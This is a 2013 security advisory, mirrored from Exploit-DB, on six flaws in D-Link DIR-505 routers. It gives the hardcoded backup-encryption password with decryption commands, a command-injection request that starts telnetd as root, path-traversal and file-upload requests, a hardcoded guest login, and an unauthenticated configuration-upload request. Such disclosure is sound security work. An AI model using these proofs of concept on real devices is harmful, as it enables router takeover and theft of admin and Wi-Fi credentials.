D-Link DIR-505 1.06 – Multiple Vulnerabilities

• Exploit Database
• 24 阅读

• 作者： Alessandro Di Pinto
  日期： 2013-09-10
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/28184/

• Multiple vulnerabilities on D-Link Dir-505 devices
  ==================================================
  
  [ADVISORY INFORMATION]
  Title:		Multiple vulnerabilities on D-Link Dir-505 devices
  Discovery date: 05/04/2013
  Release date: 	09/09/2013
  Credits: 	Alessandro Di Pinto (alessandro.dipinto () artificialstudios org)
  Twitter: 	@adipinto
  
  [AFFECTED PRODUCTS]
  This security vulnerability affects the following products and firmware
  versions:
  
  * D-Link DIR-505, firmware version <= 1.06
  
  Other products and firmware versions could also be vulnerable, but they were
  not checked.
  
  [VULNERABILITY DETAILS]
  
  1) Weak configuration file encryption
  The file provided to the end-user in order to make a backup copy of the device
  configuration, is encrypted with a hardcoded password. The device firmware
  creates the configuration file in three specific steps, as shown below:
   - Collect the configuration data to backup
   - Encrypt entries with the hardcoded password "sw5-superman"
   - Create the file header through the tool "imghdr"
  
  The file header has the fixed-size of 84 byte. An attacker ables to get an
  encrypted configuration file could decrypt its contents with the following
  command:
  
   sh# dd if=config-file of=config-file-no-header bs=84 skip=1
   sh# ccrypt -d -K sw5-superman config-file-no-header
  
  Decrypted file contains sensitive information that an attacker could use
  in order to compromise the target device (e.g., admin password and WPA
  passphrase).
  
  Furthermore, an attacker can craft a own configuration file, encrypt it with
  the hardcoded password, append at the beginning of file a valid header and
  finally upload the new configuration to the target device without
  authentication, exploiting the "Authentication bypass" issue described inside
  this advisory.
  
  
  2) Command Injection
  An authenticated attacker can exploit the "Ping Test" feature exposed inside
  the page "/System_Check.htm", in order to execute arbitrary commands inside the
  device, with root privileges. More precisely, the "ip_addr" parameter is not
  sanitized properly, thus it is possible to leverage traditional command
  injection techniques. This security issue is exploitable only after a
  successful authentication.
  
  Proof-of-Concept used to open telnet on vulnerable devices:
  
  """
  POST /my_cgi.cgi HTTP/1.1
  Host: [IP]
  Cookie: uid=[VALID-COOKIE-HERE]
  Content-Length: 55
  
  request=ping_test&ip_addr=127.0.0.1; /usr/sbin/telnetd;
  """
  
  3) Path traversal (directory listing)
  The web-gui exposed through the port 8181/TCP is used to explore the contents
  of the USB drive, connected at the device. Normally the end-user is allowed to
  list only the files inside the own USB drive but, due to insufficient security
  checks, an attacker is ables to list the contents of every file system
  directories. Only authenticated users can exploit this issue.
  
  Proof-of-Concept used to list the device's /etc/ directory:
  
  http://192.168.0.1:8181/dws/api/ListFile?id=admin&tok=
  	&volid=1&path=usb_dev/usb_A1/../../../../etc
  
  
  4) Path traversal (file upload)
  The web-gui exposed through the port 8181/TCP allows authorized users (e.g.,
  admin user) to upload files inside the USB drive connected at the device. The
  upload feature is present at the following link:
  
  http://[IP]:8181/folder_view.htm
  
  The upload operation is performed through a POST request to the resource
  "/dws/api/UploadFile" using a "multipart/form-data" content-type. Several
  parameters are passed but the "path" parameter can be abused in order to modify
  the destination directory of the uploaded file. This issue allows an
  authenticated user to upload an arbitrary file inside the target device.
  
  Proof-of-Concept used to upload a simple text file inside the /tmp/ directory:
  
  """
  POST /dws/api/UploadFile?0.35494315220771677 HTTP/1.1
  Host: [IP]:8181
  Cookie: uid=[VALID-COOKIE-HERE]
  Content-Type: multipart/form-data;
  	boundary=---------------------------736034324104825609817274318
  Content-Length: 1179
  
  -----------------------------736034324104825609817274318
  Content-Disposition: form-data; name="id"
  
  admin
  -----------------------------736034324104825609817274318
  Content-Disposition: form-data; name="tok"
  
  -----------------------------736034324104825609817274318
  Content-Disposition: form-data; name="volid"
  
  1
  -----------------------------736034324104825609817274318
  Content-Disposition: form-data; name="path"
  
  usb_dev/usb_A1/../../../../../../../../../tmp/
  -----------------------------736034324104825609817274318
  Content-Disposition: form-data; name="filename"
  
  exploit.txt
  -----------------------------736034324104825609817274318
  Content-Disposition: form-data; name="upload_file"; filename="test.txt"
  Content-Type: text/plain
  
  malicious text
  -----------------------------736034324104825609817274318--
  """
  
  
  5) Privilege escalation (hardcoded credential)
  The upload feature, described in the issue 4 titled "Path traversal (upload
  file)", is theoretically designed to be used only by authorized users (selected
  through the web-gui). The device has the following hardcoded user which cannot
  be deleted using the web-gui:
  
  username: guest
  password: guest
  
  Using this credential, the end-user can access the web-gui (exposed on the port
  8181/TCP) in read-only mode; the button used to upload files is disabled in
  attempt to deny unauthorized operations. However due to a wrong session
  handling, an attacker can bypass described limitation following below steps:
  - Login with the hardcoded user "guest" in order to get a valid cookie.
  - Using this cookie it is possible to make a direct upload request like the
  Proof-of-Concept described previously in the issue 4.
  
  The purpose of this exploit is to perform an arbitrary file upload using an
  hardcoded (read-only) user.
  
  
  6) Authentication bypass
  The "my_cgi.cgi" resource exposes several features accessible with no
  authentication. In particular, every request that specifies the HTTP header
  field "Content-type: multipart/form-data" is processed without perform any
  authentication check. An *unauthenticated* attacker can exploit this issue in
  order to upload a malicious configuration on the target device, overwriting the
  original configurations (e.g., set a new admin password).
  
  Proof-of-Concept used to upload a configuration file without perform the login:
  
  """
  POST /my_cgi.cgi HTTP/1.1
  Host: [IP]
  Cookie: uid=[VALID-COOKIE-HERE]
  Content-Type: multipart/form-data;
  	boundary=---------------------------4318828241986447042487864450
  Content-Length: 382
  
  -----------------------------4318828241986447042487864450
  Content-Disposition: form-data; name="which_action"
  
  load_conf
  -----------------------------4318828241986447042487864450
  Content-Disposition: form-data; name="file"; filename="attacker-config.bin"
  Content-Type: text/plain
  
  [MALICIOUS-CONFIGURATION-HERE]
  -----------------------------4318828241986447042487864450--
  """
  
  [REMEDIATION]
  D-Link has released an updated firmware version (1.07) that addresses most of
  the described issues. Firmware is already available on D-Link web site, at the
  following URL:
  ftp://ftp.dlink.com/Gateway/dir505/Firmware/dir505_fw_107.zip
  
  [DISCLAIMER]
  The author is not responsible for the misuse of the information provided in
  this security advisory. The advisory is a service to the professional security
  community. There are NO WARRANTIES with regard to this information. Any
  application or distribution of this information constitutes acceptance AS IS,
  at the user's own risk. This information is subject to change without notice.